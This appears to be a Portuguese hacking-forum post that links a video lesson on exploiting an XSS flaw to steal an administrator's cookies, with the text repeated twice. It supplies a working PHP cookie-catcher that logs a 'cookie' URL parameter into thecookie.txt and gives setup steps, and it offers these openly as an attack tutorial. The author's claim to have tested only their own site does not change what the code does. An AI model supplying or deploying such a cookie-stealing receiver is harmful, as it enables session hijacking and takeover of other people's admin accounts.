Olá, fiz uma video aula, explicando como utilizar a falha xss para pegar os cookies do admin.
Video:
[ame="http://www.youtube.com/watch?v=MuW_l4quGWg&noredirect=1"]http://www.youtube.com/watch?v=MuW_l4quGWg&noredirect=1[/ame]
Crie um arquivo php este será para pegar os cookies
-------------------------------------------------------------------
E outro para abrir os cookies
Crie um arquivo .txt com o nome
thecookie
-------------------------------------------------------------------
Ah e me desculpe por colocar no defacer Guia do hacker, por que não pode,
mas não utilizo esse site para hospedar em sites...
Esse site que testei é meu.
--------------------------------------------------------------------
Obrigado
Video:
[ame="http://www.youtube.com/watch?v=MuW_l4quGWg&noredirect=1"]http://www.youtube.com/watch?v=MuW_l4quGWg&noredirect=1[/ame]
Crie um arquivo php este será para pegar os cookies
Código:
<?php $buka = fopen("thecookie.txt","a"); if(is_writable("thecookie.txt")){ fwrite($buka,"\n".$_GET['cookie']."\n"); } fclose($buka); ?>
E outro para abrir os cookies
Crie um arquivo .txt com o nome
thecookie
-------------------------------------------------------------------
Ah e me desculpe por colocar no defacer Guia do hacker, por que não pode,
mas não utilizo esse site para hospedar em sites...
Esse site que testei é meu.
--------------------------------------------------------------------
Obrigado